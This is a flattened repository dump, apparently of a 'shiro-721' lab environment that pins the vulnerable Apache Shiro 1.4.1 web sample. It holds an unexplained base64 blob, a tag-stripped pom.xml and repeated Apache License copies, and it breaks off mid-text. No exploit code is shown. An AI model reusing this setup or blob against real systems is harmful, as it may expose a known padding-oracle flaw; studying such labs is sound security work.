w2f0azT63u9WAkDfEZ8SagudFUw+u24d6c4R2ANw4kW5PXfSYxoL3YI4cHtBHAQQWktddrS5fE4reNAMlCwIugWK8UWLtxWaFEiITdVhf0cZsKbVUTQt91a03y8CVzj5y8f5t6VPOmC46M6Dyxufg+1KmmZB50Sn1MaMD6auxRbYFQgKzaeSVf26t1e63Gg7nDq+bKWwf3+PAJR5onNEqIVc2xJ504SdZCsbkafcJwNk8r/1iKkxjzD+9bee7qZQgA1VuzHrRlIubkpUsaN/pRFPvSiYNTT/5Kv8JrCbdxVp+FLy/du0bIF+9jfcSV3SKvwlhxPeGhg6HkJTnb4JlUJThQZn67R9YpFubqJtTBJEH9unNptM/r0UOwHrtF3GdnOxtPH/vRXnVz92GnIcsUf3jK3Fub1U8Tu3canOlsj/pMPjK4ykn3wWjUFGGRDJcfaVrEDWwVCJJNUFqlyb+NBOqMccRw5Dd49w4QI1+Wstt60EawofX0QSqwItwc0nCfA1DJ0z4YYOt9f5G9pn5JhXMbCyahHb7Hv49VXsSNtrzHJf+nbN7xeUzW2FytY3+wrpgX6BAM4hv7fNzlsJw2ybrZ+Xr6EYwGGmg9CbJAyRzhiNL4MsCO7sywvwYGhoA+92gxSd9yZPUf7SQMt3bZDDRT9UObfLB93Uw3oPJTVmDDDRBC6dKO82+Tfw8RtUg23WUlQWgVfza0lJVOESVmm9SC9A8al3fZ0UqiDTX0eUuJ+KluKiqFlsc7GpxA4KunMyls0nbVo3trmkM1/QQwxnl5lBx7BfniJ25TYMSCOW9VJTeAMJWpHHG4P32yxiy3Wu1KmyGLowZh12jfD9P4xK2a9wityaUcmG+MwecAUiS7QWRmHITrESTFj1I1NgY4DdQ///eQ6faBHGDNrqupwVvRBt3eMe9mncTVDcetz7QTzHRrFJeUVHYeGva5fOmWZfmAmJj6RvWJIipo++9kHhJRGI1ToijDxn2bqcR3aXEa/laZtHOTNZAk+QngMCNWk/RlRlivY8VYpcOKdU2vvqa4FKwR9tk5a6+/JZ3VwEWKo9zQf6ZZPGr0QZiZJyGHcRsTbyTloWC3d49+njmZxrv/1CEJ0I/ygDrZAOhxz0keQB90rXico9Rhk2P3XCM5X6zsaybx10hIB9w/d1dRT4jrsy34Mhwa9dY2uWIfXvYqj9iS3RA/SgP9HobHhc1Ly14xp40IZvR3qW/qYzU9P4NeljN2bVb5VlwogfIKGMjD7ZaXMZf24FDWBYbDDfoBNpcpuuJIayc1LocZRttHxs9KqIQ807pYLRn18uNAQpdvLdZi8z1pHUvpNmYSro3bcMNvN92jV1Hs6EGreoHI7IS5DDEzFbCNW179erKmnG0fv75HyBijnod0/fiR5scxviLnTkcmws4PpckJqarOvQE2+ocoahG1f/iIHqNSE1gCidhFROE+i/lDG0hle2svEDWvFDWMcJqJlEvfX6JtwHYJdqrEPtUaus+3MgTI0CuDpYbmLl98QIKPRydzWvgMeeP7e1ukolz2tkx43JOrLCDmaWNMffEe1WtNjIfFVjqg9cgBrXIG3nwmoRptvfdY3sx5ODa8jgaP/5ItYjotvV41PRgsTc1wbH2U1tg0EGmQ791KdHHSMRpvMpGLJjm36Df8MObu44YeQsjhJPRAO0f7Nz3ePXzOtqy4j5N5FsCA1XX6qRaOpcAj5s/fEBCntQZm8rrlMwkHAH22Dh92qA92B+iEvFHYMKVTTDLZDe2zrb7xVuZUI1egO7h27CCD9GDgBqcCxCOVyFqrxExMMdkLOtPk19THk8aT8IzMhmxZVIHMDBsBrjgfXxgwb6GCOrrAfN3aqmWY0+WUjZjeWCaHtBy2rtjURJOVqE/nBIEmyQ1CpQSH9hT8u9UPGqHkx97bQ== 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /shiro-721/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 20 | 21 | 22 | 23 | 24 | org.apache.shiro.samples 25 | shiro-samples 26 | 1.4.1 27 | ../pom.xml 28 | 29 | 30 | 4.0.0 31 | samples-web 32 | Apache Shiro :: Samples :: Web 33 | war 34 | 35 | 36 | 9080 37 | 1 38 | 39 | 40 | 41 | 42 | 43 | org.eclipse.jetty 44 | jetty-maven-plugin 45 | ${jetty.version} 46 | 47 | / 48 | 49 | 9080 50 | 60000 51 | 52 | 53 | ./target/yyyy_mm_dd.request.log 54 | 90 55 | true 56 | false 57 | GMT 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | javax.servlet 67 | jstl 68 | runtime 69 | 70 | 71 | javax.servlet 72 | javax.servlet-api 73 | provided 74 | 75 | 76 | org.slf4j 77 | slf4j-log4j12 78 | runtime 79 | 80 | 81 | log4j 82 | log4j 83 | runtime 84 | 85 | 86 | net.sourceforge.htmlunit 87 | htmlunit 88 | test 89 | 90 | 91 | org.apache.shiro 92 | shiro-core 93 | 94 | 95 | org.apache.shiro 96 | shiro-web 97 | 98 | 99 | taglibs 100 | standard 101 | 102 | 103 | org.slf4j 104 | jcl-over-slf4j 105 | runtime 106 | 107 | 108 | org.eclipse.jetty 109 | apache-jsp 110 | ${jetty.version} 111 | test 112 | 113 | 114 | org.eclipse.jetty 115 | apache-jstl 116 | ${jetty.version} 117 | pom 118 | test 119 | 120 | 121 | org.apache.shiro.integrationtests 122 | shiro-its-support 123 | test 124 | 125 | 126 | 127 | 128 | 129 | -------------------------------------------------------------------------------- /shiro-721/target/classes/META-INF/LICENSE: -------------------------------------------------------------------------------- 1 | 2 | Apache License 3 | Version 2.0, January 2004 4 | http://www.apache.org/licenses/ 5 | 6 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 7 | 8 | 1. Definitions. 9 | 10 | "License" shall mean the terms and conditions for use, reproduction, 11 | and distribution as defined by Sections 1 through 9 of this document. 12 | 13 | "Licensor" shall mean the copyright owner or entity authorized by 14 | the copyright owner that is granting the License. 15 | 16 | "Legal Entity" shall mean the union of the acting entity and all 17 | other entities that control, are controlled by, or are under common 18 | control with that entity. For the purposes of this definition, 19 | "control" means (i) the power, direct or indirect, to cause the 20 | direction or management of such entity, whether by contract or 21 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 22 | outstanding shares, or (iii) beneficial ownership of such entity. 23 | 24 | "You" (or "Your") shall mean an individual or Legal Entity 25 | exercising permissions granted by this License. 26 | 27 | "Source" form shall mean the preferred form for making modifications, 28 | including but not limited to software source code, documentation 29 | source, and configuration files. 30 | 31 | "Object" form shall mean any form resulting from mechanical 32 | transformation or translation of a Source form, including but 33 | not limited to compiled object code, generated documentation, 34 | and conversions to other media types. 35 | 36 | "Work" shall mean the work of authorship, whether in Source or 37 | Object form, made available under the License, as indicated by a 38 | copyright notice that is included in or attached to the work 39 | (an example is provided in the Appendix below). 40 | 41 | "Derivative Works" shall mean any work, whether in Source or Object 42 | form, that is based on (or derived from) the Work and for which the 43 | editorial revisions, annotations, elaborations, or other modifications 44 | represent, as a whole, an original work of authorship. For the purposes 45 | of this License, Derivative Works shall not include works that remain 46 | separable from, or merely link (or bind by name) to the interfaces of, 47 | the Work and Derivative Works thereof. 48 | 49 | "Contribution" shall mean any work of authorship, including 50 | the original version of the Work and any modifications or additions 51 | to that Work or Derivative Works thereof, that is intentionally 52 | submitted to Licensor for inclusion in the Work by the copyright owner 53 | or by an individual or Legal Entity authorized to submit on behalf of 54 | the copyright owner. For the purposes of this definition, "submitted" 55 | means any form of electronic, verbal, or written communication sent 56 | to the Licensor or its representatives, including but not limited to 57 | communication on electronic mailing lists, source code control systems, 58 | and issue tracking systems that are managed by, or on behalf of, the 59 | Licensor for the purpose of discussing and improving the Work, but 60 | excluding communication that is conspicuously marked or otherwise 61 | designated in writing by the copyright owner as "Not a Contribution." 62 | 63 | "Contributor" shall mean Licensor and any individual or Legal Entity 64 | on behalf of whom a Contribution has been received by Licensor and 65 | subsequently incorporated within the Work. 66 | 67 | 2. Grant of Copyright License. Subject to the terms and conditions of 68 | this License, each Contributor hereby grants to You a perpetual, 69 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 70 | copyright license to reproduce, prepare Derivative Works of, 71 | publicly display, publicly perform, sublicense, and distribute the 72 | Work and such Derivative Works in Source or Object form. 73 | 74 | 3. Grant of Patent License. Subject to the terms and conditions of 75 | this License, each Contributor hereby grants to You a perpetual, 76 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 77 | (except as stated in this section) patent license to make, have made, 78 | use, offer to sell, sell, import, and otherwise transfer the Work, 79 | where such license applies only to those patent claims licensable 80 | by such Contributor that are necessarily infringed by their 81 | Contribution(s) alone or by combination of their Contribution(s) 82 | with the Work to which such Contribution(s) was submitted. If You 83 | institute patent litigation against any entity (including a 84 | cross-claim or counterclaim in a lawsuit) alleging that the Work 85 | or a Contribution incorporated within the Work constitutes direct 86 | or contributory patent infringement, then any patent licenses 87 | granted to You under this License for that Work shall terminate 88 | as of the date such litigation is filed. 89 | 90 | 4. Redistribution. You may reproduce and distribute copies of the 91 | Work or Derivative Works thereof in any medium, with or without 92 | modifications, and in Source or Object form, provided that You 93 | meet the following conditions: 94 | 95 | (a) You must give any other recipients of the Work or 96 | Derivative Works a copy of this License; and 97 | 98 | (b) You must cause any modified files to carry prominent notices 99 | stating that You changed the files; and 100 | 101 | (c) You must retain, in the Source form of any Derivative Works 102 | that You distribute, all copyright, patent, trademark, and 103 | attribution notices from the Source form of the Work, 104 | excluding those notices that do not pertain to any part of 105 | the Derivative Works; and 106 | 107 | (d) If the Work includes a "NOTICE" text file as part of its 108 | distribution, then any Derivative Works that You distribute must 109 | include a readable copy of the attribution notices contained 110 | within such NOTICE file, excluding those notices that do not 111 | pertain to any part of the Derivative Works, in at least one 112 | of the following places: within a NOTICE text file distributed 113 | as part of the Derivative Works; within the Source form or 114 | documentation, if provided along with the Derivative Works; or, 115 | within a display generated by the Derivative Works, if and 116 | wherever such third-party notices normally appear. The contents 117 | of the NOTICE file are for informational purposes only and 118 | do not modify the License. You may add Your own attribution 119 | notices within Derivative Works that You distribute, alongside 120 | or as an addendum to the NOTICE text from the Work, provided 121 | that such additional attribution notices cannot be construed 122 | as modifying the License. 123 | 124 | You may add Your own copyright statement to Your modifications and 125 | may provide additional or different license terms and conditions 126 | for use, reproduction, or distribution of Your modifications, or 127 | for any such Derivative Works as a whole, provided Your use, 128 | reproduction, and distribution of the Work otherwise complies with 129 | the conditions stated in this License. 130 | 131 | 5. Submission of Contributions. Unless You explicitly state otherwise, 132 | any Contribution intentionally submitted for inclusion in the Work 133 | by You to the Licensor shall be under the terms and conditions of 134 | this License, without any additional terms or conditions. 135 | Notwithstanding the above, nothing herein shall supersede or modify 136 | the terms of any separate license agreement you may have executed 137 | with Licensor regarding such Contributions. 138 | 139 | 6. Trademarks. This License does not grant permission to use the trade 140 | names, trademarks, service marks, or product names of the Licensor, 141 | except as required for reasonable and customary use in describing the 142 | origin of the Work and reproducing the content of the NOTICE file. 143 | 144 | 7. Disclaimer of Warranty. Unless required by applicable law or 145 | agreed to in writing, Licensor provides the Work (and each 146 | Contributor provides its Contributions) on an "AS IS" BASIS, 147 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 148 | implied, including, without limitation, any warranties or conditions 149 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 150 | PARTICULAR PURPOSE. You are solely responsible for determining the 151 | appropriateness of using or redistributing the Work and assume any 152 | risks associated with Your exercise of permissions under this License. 153 | 154 | 8. Limitation of Liability. In no event and under no legal theory, 155 | whether in tort (including negligence), contract, or otherwise, 156 | unless required by applicable law (such as deliberate and grossly 157 | negligent acts) or agreed to in writing, shall any Contributor be 158 | liable to You for damages, including any direct, indirect, special, 159 | incidental, or consequential damages of any character arising as a 160 | result of this License or out of the use or inability to use the 161 | Work (including but not limited to damages for loss of goodwill, 162 | work stoppage, computer failure or malfunction, or any and all 163 | other commercial damages or losses), even if such Contributor 164 | has been advised of the possibility of such damages. 165 | 166 | 9. Accepting Warranty or Additional Liability. While redistributing 167 | the Work or Derivative Works thereof, You may choose to offer, 168 | and charge a fee for, acceptance of support, warranty, indemnity, 169 | or other liability obligations and/or rights consistent with this 170 | License. However, in accepting such obligations, You may act only 171 | on Your own behalf and on Your sole responsibility, not on behalf 172 | of any other Contributor, and only if You agree to indemnify, 173 | defend, and hold each Contributor harmless for any liability 174 | incurred by, or claims asserted against, such Contributor by reason 175 | of your accepting any such warranty or additional liability. 176 | 177 | END OF TERMS AND CONDITIONS 178 | 179 | APPENDIX: How to apply the Apache License to your work. 180 | 181 | To apply the Apache License to your work, attach the following 182 | boilerplate notice, with the fields enclosed by brackets "[]" 183 | replaced with your own identifying information. (Don't include 184 | the brackets!) The text should be enclosed in the appropriate 185 | comment syntax for the file format. We also recommend that a 186 | file or class name and description of purpose be included on the 187 | same "printed page" as the copyright notice for easier 188 | identification within third-party archives. 189 | 190 | Copyright [yyyy] [name of copyright owner] 191 | 192 | Licensed under the Apache License, Version 2.0 (the "License"); 193 | you may not use this file except in compliance with the License. 194 | You may obtain a copy of the License at 195 | 196 | http://www.apache.org/licenses/LICENSE-2.0 197 | 198 | Unless required by applicable law or agreed to in writing, software 199 | distributed under the License is distributed on an "AS IS" BASIS, 200 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 201 | See the License for the specific language governing permissions and 202 | limitations under the License. 203 | -------------------------------------------------------------------------------- /shiro-721/target/test-classes/META-INF/LICENSE: -------------------------------------------------------------------------------- 1 | 2 | Apache License 3 | Version 2.0, January 2004 4 | http://www.apache.org/licenses/ 5 | 6 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 7 | 8 | 1. Definitions. 9 | 10 | "License" shall mean the terms and conditions for use, reproduction, 11 | and distribution as defined by Sections 1 through 9 of this document. 12 | 13 | "Licensor" shall mean the copyright owner or entity authorized by 14 | the copyright owner that is granting the License. 15 | 16 | "Legal Entity" shall mean the union of the acting entity and all 17 | other entities that control, are controlled by, or are under common 18 | control with that entity. For the purposes of this definition, 19 | "control" means (i) the power, direct or indirect, to cause the 20 | direction or management of such entity, whether by contract or 21 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 22 | outstanding shares, or (iii) beneficial ownership of such entity. 23 | 24 | "You" (or "Your") shall mean an individual or Legal Entity 25 | exercising permissions granted by this License. 26 | 27 | "Source" form shall mean the preferred form for making modifications, 28 | including but not limited to software source code, documentation 29 | source, and configuration files. 30 | 31 | "Object" form shall mean any form resulting from mechanical 32 | transformation or translation of a Source form, including but 33 | not limited to compiled object code, generated documentation, 34 | and conversions to other media types. 35 | 36 | "Work" shall mean the work of authorship, whether in Source or 37 | Object form, made available under the License, as indicated by a 38 | copyright notice that is included in or attached to the work 39 | (an example is provided in the Appendix below). 40 | 41 | "Derivative Works" shall mean any work, whether in Source or Object 42 | form, that is based on (or derived from) the Work and for which the 43 | editorial revisions, annotations, elaborations, or other modifications 44 | represent, as a whole, an original work of authorship. For the purposes 45 | of this License, Derivative Works shall not include works that remain 46 | separable from, or merely link (or bind by name) to the interfaces of, 47 | the Work and Derivative Works thereof. 48 | 49 | "Contribution" shall mean any work of authorship, including 50 | the original version of the Work and any modifications or additions 51 | to that Work or Derivative Works thereof, that is intentionally 52 | submitted to Licensor for inclusion in the Work by the copyright owner 53 | or by an individual or Legal Entity authorized to submit on behalf of 54 | the copyright owner. For the purposes of this definition, "submitted" 55 | means any form of electronic, verbal, or written communication sent 56 | to the Licensor or its representatives, including but not limited to 57 | communication on electronic mailing lists, source code control systems, 58 | and issue tracking systems that are managed by, or on behalf of, the 59 | Licensor for the purpose of discussing and improving the Work, but 60 | excluding communication that is conspicuously marked or otherwise 61 | designated in writing by the copyright owner as "Not a Contribution." 62 | 63 | "Contributor" shall mean Licensor and any individual or Legal Entity 64 | on behalf of whom a Contribution has been received by Licensor and 65 | subsequently incorporated within the Work. 66 | 67 | 2. Grant of Copyright License. Subject to the terms and conditions of 68 | this License, each Contributor hereby grants to You a perpetual, 69 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 70 | copyright license to reproduce, prepare Derivative Works of, 71 | publicly display, publicly perform, sublicense, and distribute the 72 | Work and such Derivative Works in Source or Object form. 73 | 74 | 3. Grant of Patent License. Subject to the terms and conditions of 75 | this License, each Contributor hereby grants to You a perpetual, 76 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 77 | (except as stated in this section) patent license to make, have made, 78 | use, offer to sell, sell, import, and otherwise transfer the Work, 79 | where such license applies only to those patent claims licensable 80 | by such Contributor that are necessarily infringed by their 81 | Contribution(s) alone or by combination of their Contribution(s) 82 | with the Work to which such Contribution(s) was submitted. If You 83 | institute patent litigation against any entity (including a 84 | cross-claim or counterclaim in a lawsuit) alleging that the Work 85 | or a Contribution incorporated within the Work constitutes direct 86 | or contributory patent infringement, then any patent licenses 87 | granted to You under this License for that Work shall terminate 88 | as of the date such litigation is filed. 89 | 90 | 4. Redistribution. You may reproduce and distribute copies of the 91 | Work or Derivative Works thereof in any medium, with or without 92 | modifications, and in Source or Object form, provided that You 93 | meet the following conditions: 94 | 95 | (a) You must give any other recipients of the Work or 96 | Derivative Works a copy of this License; and 97 | 98 | (b) You must cause any modified files to carry prominent notices 99 | stating that You changed the files; and 100 | 101 | (c) You must retain, in the Source form of any Derivative Works 102 | that You distribute, all copyright, patent, trademark, and 103 | attribution notices from the Source form of the Work, 104 | excluding those notices that do not pertain to any part of 105 | the Derivative Works; and 106 | 107 | (d) If the Work includes a "NOTICE" text file as part of its 108 | distribution, then any Derivative Works that You distribute must 109 | include a readable copy of the attribution notices contained 110 | within such NOTICE file, excluding those notices that do not 111 | pertain to any part of the Derivative Works, in at least one 112 | of the following places: within a NOTICE text file distributed 113 | as part of the Derivative Works; within the Source form or 114 | documentation, if provided along with the Derivative Works; or, 115 | within a display generated by the Derivative Works, if and 116 | wherever such third-party notices normally appear. The contents 117 | of the NOTICE file are for informational purposes only and 118 | do not modify the License. You may add Your own attribution 119 | notices within Derivative Works that You distribute, alongside 120 | or as an addendum to the NOTICE text from the Work, provided 121 | that such additional attribution notices cannot be construed 122 | as modifying the License. 123 | 124 | You may add Your own copyright statement to Your modifications and 125 | may provide additional or different license terms and conditions 126 | for use, reproduction, or distribution of Your modifications, or 127 | for any such Derivative Works as a whole, provided Your use, 128 | reproduction, and distribution of the Work otherwise complies with 129 | the conditions stated in this License. 130 | 131 | 5. Submission of Contributions. Unless You explicitly state otherwise, 132 | any Contribution intentionally submitted for inclusion in the Work 133 | by You to the Licensor shall be under the terms and conditions of 134 | this License, without any additional terms or conditions. 135 | Notwithstanding the above, nothing herein shall supersede or modify 136 | the terms of any separate license agreement you may have executed 137 | with Licensor regarding such Contributions. 138 | 139 | 6. Trademarks. This License does not grant permission to use the trade 140 | names, trademarks, service marks, or product names of the Licensor, 141 | except as required for reasonable and customary use in describing the 142 | origin of the Work and reproducing the content of the NOTICE file. 143 | 144 | 7. Disclaimer of Warranty. Unless required by applicable law or 145 | agreed to in writing, Licensor provides the Work (and each 146 | Contributor provides its Contributions) on an "AS IS" BASIS, 147 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 148 | implied, including, without limitation, any warranties or conditions 149 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 150 | PARTICULAR PURPOSE. You are solely responsible for determining the 151 | appropriateness of using or redistributing the Work and assume any 152 | risks associated with Your exercise of permissions under this License. 153 | 154 | 8. Limitation of Liability. In no event and under no legal theory, 155 | whether in tort (including negligence), contract, or otherwise, 156 | unless required by applicable law (such as deliberate and grossly 157 | negligent acts) or agreed to in writing, shall any Contributor be 158 | liable to You for damages, including any direct, indirect, special, 159 | incidental, or consequential damages of any character arising as a 160 | result of this License or out of the use or inability to use the 161 | Work (including but not limited to damages for loss of goodwill, 162 | work stoppage, computer failure or malfunction, or any and all 163 | other commercial damages or losses), even if such Contributor 164 | has been advised of the possibility of such damages. 165 | 166 | 9. Accepting Warranty or Additional Liability. While redistributing 167 | the Work or Derivative Works thereof, You may choose to offer, 168 | and charge a fee for, acceptance of support, warranty, indemnity, 169 | or other liability obligations and/or rights consistent with this 170 | License. However, in accepting such obligations, You may act only 171 | on Your own behalf and on Your sole responsibility, not on behalf 172 | of any other Contributor, and only if You agree to indemnify, 173 | defend, and hold each Contributor harmless for any liability 174 | incurred by, or claims asserted against, such Contributor by reason 175 | of your accepting any such warranty or additional liability. 176 | 177 | END OF TERMS AND CONDITIONS 178 | 179 | APPENDIX: How to apply the Apache License to your work. 180 | 181 | To apply the Apache License to your work, attach the following 182 | boilerplate notice, with the fields enclosed by brackets "[]" 183 | replaced with your own identifying information. (Don't include 184 | the brackets!) The text should be enclosed in the appropriate 185 | comment syntax for the file format. We also recommend that a 186 | file or class name and description of purpose be included on the 187 | same "printed page" as the copyright notice for easier 188 | identification within third-party archives. 189 | 190 | Copyright [yyyy] [name of copyright owner] 191 | 192 | Licensed under the Apache License, Version 2.0 (the "License"); 193 | you may not use this file except in compliance with the License. 194 | You may obtain a copy of the License at 195 | 196 | http://www.apache.org/licenses/LICENSE-2.0 197 | 198 | Unless required by applicable law or agreed to in writing, software 199 | distributed under the License is distributed on an "AS IS" BASIS, 200 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 201 | See the License for the specific language governing permissions and 202 | limitations under the License. 203 | -------------------------------------------------------------------------------- /shiro-721/target/maven-shared-archive-resources/META-INF/LICENSE: -------------------------------------------------------------------------------- 1 | 2 | Apache License 3 | Version 2.0, January 2004 4 | http://www.apache.org/licenses/ 5 | 6 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 7 | 8 | 1. Definitions. 9 | 10 | "License" shall mean the terms and conditions for use, reproduction, 11 | and distribution as defined by Sections 1 through 9 of this document. 12 | 13 | "Licensor" shall mean the copyright owner or entity authorized by 14 | the copyright owner that is granting the License. 15 | 16 | "Legal Entity" shall mean the union of the acting entity and all 17 | other entities that control, are controlled by, or are under common 18 | control with that entity. For the purposes of this definition, 19 | "control" means (i) the power, direct or indirect, to cause the 20 | direction or management of such entity, whether by contract or 21 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 22 | outstanding shares, or (iii) beneficial ownership of such entity. 23 | 24 | "You" (or "Your") shall mean an individual or Legal Entity 25 | exercising permissions granted by this License. 26 | 27 | "Source" form shall mean the preferred form for making modifications, 28 | including but not limited to software source code, documentation 29 | source, and configuration files. 30 | 31 | "Object" form shall mean any form resulting from mechanical 32 | transformation or translation of a Source form, including but 33 | not limited to compiled object code, generated documentation, 34 | and conversions to other media types. 35 | 36 | "Work" shall mean the work of authorship, whether in Source or 37 | Object form, made available under the License, as indicated by a 38 | copyright notice that is included in or attached to the work 39 | (an example is provided in the Appendix below). 40 | 41 | "Derivative Works" shall mean any work, whether in Source or Object 42 | form, that is based on (or derived from) the Work and for which the 43 | editorial revisions, annotations, elaborations, or other modifications 44 | represent, as a whole, an original work of authorship. For the purposes 45 | of this License, Derivative Works shall not include works that remain 46 | separable from, or merely link (or bind by name) to the interfaces of, 47 | the Work and Derivative Works thereof. 48 | 49 | "Contribution" shall mean any work of authorship, including 50 | the original version of the Work and any modifications or additions 51 | to that Work or Derivative Works thereof, that is intentionally 52 | submitted to Licensor for inclusion in the Work by the copyright owner 53 | or by an individual or Legal Entity authorized to submit on behalf of 54 | the copyright owner. For the purposes of this definition, "submitted" 55 | means any form of electronic, verbal, or written communication sent 56 | to the Licensor or its representatives, including but not limited to 57 | communication on electronic mailing lists, source code control systems, 58 | and issue tracking systems that are managed by, or on behalf of, the 59 | Licensor for the purpose of discussing and improving the Work, but 60 | excluding communication that is conspicuously marked or otherwise 61 | designated in writing by the copyright owner as "Not a Contribution." 62 | 63 | "Contributor" shall mean Licensor and any individual or Legal Entity 64 | on behalf of whom a Contribution has been received by Licensor and 65 | subsequently incorporated within the Work. 66 | 67 | 2. Grant of Copyright License. Subject to the terms and conditions of 68 | this License, each Contributor hereby grants to You a perpetual, 69 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 70 | copyright license to reproduce, prepare Derivative Works of, 71 | publicly display, publicly perform, sublicense, and distribute the 72 | Work and such Derivative Works in Source or Object form. 73 | 74 | 3. Grant of Patent License. Subject to the terms and conditions of 75 | this License, each Contributor hereby grants to You a perpetual, 76 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 77 | (except as stated in this section) patent license to make, have made, 78 | use, offer to sell, sell, import, and otherwise transfer the Work, 79 | where such license applies only to those patent claims licensable 80 | by such Contributor that are necessarily infringed by their 81 | Contribution(s) alone or by combination of their Contribution(s) 82 | with the Work to which such Contribution(s) was submitted. If You 83 | institute patent litigation against any entity (including a 84 | cross-claim or counterclaim in a lawsuit) alleging that the Work 85 | or a Contribution incorporated within the Work constitutes direct 86 | or contributory patent infringement, then any patent licenses 87 | granted to You under this License for that Work shall terminate 88 | as of the date such litigation is filed. 89 | 90 | 4. Redistribution. You may reproduce and distribute copies of the 91 | Work or Derivative Works thereof in any medium, with or without 92 | modifications, and in Source or Object form, provided that You 93 | meet the following conditions: 94 | 95 | (a) You must give any other recipients of the Work or 96 | Derivative Works a copy of this License; and 97 | 98 | (b) You must cause any modified files to carry prominent notices 99 | stating that You changed the files; and 100 | 101 | (c) You must retain, in the Source form of any Derivative Works 102 | that You distribute, all copyright, patent, trademark, and 103 | attribution notices from the Source form of the Work, 104 | excluding those notices that do not pertain to any part of 105 | the Derivative Works; and 106 | 107 | (d) If the Work includes a "NOTICE" text file as part of its 108 | distribution, then any Derivative Works that You distribute must 109 | include a readable copy of the attribution notices contained 110 | within such NOTICE file, excluding those notices that do not 111 | pertain to any part of the Derivative Works, in at least one 112 | of the following places: within a NOTICE text file distributed 113 | as part of the Derivative Works; within the Source form or 114 | documentation, if provided along with the Derivative Works; or, 115 | within a display generated by the Derivative Works, if and 116 | wherever such third-party notices normally appear. The contents 117 | of the NOTICE file are for informational purposes only and 118 | do not modify the License. You may add Your own attribution 119 | notices within Derivative Works that You distribute, alongside 120 | or as an addendum to the NOTICE text from the Work, provided 121 | that such additional attribution notices cannot be construed 122 | as modifying the License. 123 | 124 | You may add Your own copyright statement to Your modifications and 125 | may provide additional or different license terms and conditions 126 | for use, reproduction, or distribution of Your modifications, or 127 | for any such Derivative Works as a whole, provided Your use, 128 | reproduction, and distribution of the Work otherwise complies with 129 | the conditions stated in this License. 130 | 131 | 5. Submission of Contributions. Unless You explicitly state otherwise, 132 | any Contribution intentionally submitted for inclusion in the Work 133 | by You to the Licensor shall be under the terms and conditions of 134 | this License, without any additional terms or conditions. 135 | Notwithstanding the above, nothing herein shall supersede or modify 136 | the terms of any separate license agreement you may have executed 137 | with Licensor regarding such Contributions. 138 | 139 | 6. Trademarks. This License does not grant permission to use the trade 140 | names, trademarks, service marks, or product names of the Licensor, 141 | except as required for reasonable and customary use in describing the 142 | origin of the Work and reproducing the content of the NOTICE file. 143 | 144 | 7. Disclaimer of Warranty. Unless required by applicable law or 145 | agreed to in writing, Licensor provides the Work (and each 146 | Contributor provides its Contributions) on an "AS IS" BASIS, 147 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 148 | implied, including, without limitation, any warranties or conditions 149 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 150 | PARTICULAR PURPOSE. You are solely responsible for determining the 151 | appropriateness of using or redistributing the Work and assume any 152 | risks associated with Your exercise of permissions under this License. 153 | 154 | 8. Limitation of Liability. In no event and under no legal theory, 155 | whether in tort (including negligence), contract, or otherwise, 156 | unless required by applicable law (such as deliberate and grossly 157 | negligent acts) or agreed to in writing, shall any Contributor be 158 | liable to You for damages, including any direct, indirect, special, 159 | incidental, or consequential damages of any character arising as a 160 | result of this License or out of the use or inability to use the 161 | Work (including but not limited to damages for loss of goodwill, 162 | work stoppage, computer failure or malfunction, or any and all 163 | other commercial damages or losses), even if such Contributor 164 | has been advised of the possibility of such damages. 165 | 166 | 9. Accepting Warranty or Additional Liability. While redistributing 167 | the Work or Derivative Works thereof, You may choose to offer, 168 | and charge a fee for, acceptance of support, warranty, indemnity, 169 | or other liability obligations and/or rights consistent with this 170 | License. However, in accepting such obligations, You may act only 171 | on Your own behalf and on Your sole responsibility, not on behalf 172 | of any other Contributor, and only if You agree to indemnify, 173 | defend, and hold each Contributor harmless for any liability 174 | incurred by, or claims asserted against, such Contributor by reason 175 | of your accepting any such warranty or additional liability. 176 | 177 | END OF TERMS AND CONDITIONS 178 | 179 | APPENDIX: How to apply the Apache License to your work. 180 | 181 | To apply the Apache License to your work, attach the following 182 | boilerplate notice, with the fields enclosed by brackets "[]" 183 | replaced with your own identifying information. (Don't include 184 | the brackets!) The text should be enclosed in the appropriate 185 | comment syntax for the file format. We also recommend that a 186 | file or class name and description of purpose be included on the 187 | same "printed page" as the copyright notice for easier 188 | identification within third-party archives. 189 | 190 | Copyright [yyyy] [name of copyright owner] 191 | 192 | Licensed under the Apache License, Version 2.0 (the "License"); 193 | you may not use this file except in compliance with the License. 194 | You may obtain a copy of the License at 195 | 196 | http://www.apache.org/licenses/LICENSE-2.0 197 | 198 | Unless required by applicable law or agreed to in writing, software 199 | distributed under the License is distributed on an "AS IS" BASIS, 200 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 201 | See the License for the specific language governing permissions and 202 | limitations under the License. 203 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/classes/META-INF/LICENSE: -------------------------------------------------------------------------------- 1 | 2 | Apache License 3 | Version 2.0, January 2004 4 | http://www.apache.org/licenses/ 5 | 6 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 7 | 8 | 1. Definitions. 9 | 10 | "License" shall mean the terms and conditions for use, reproduction, 11 | and distribution as defined by 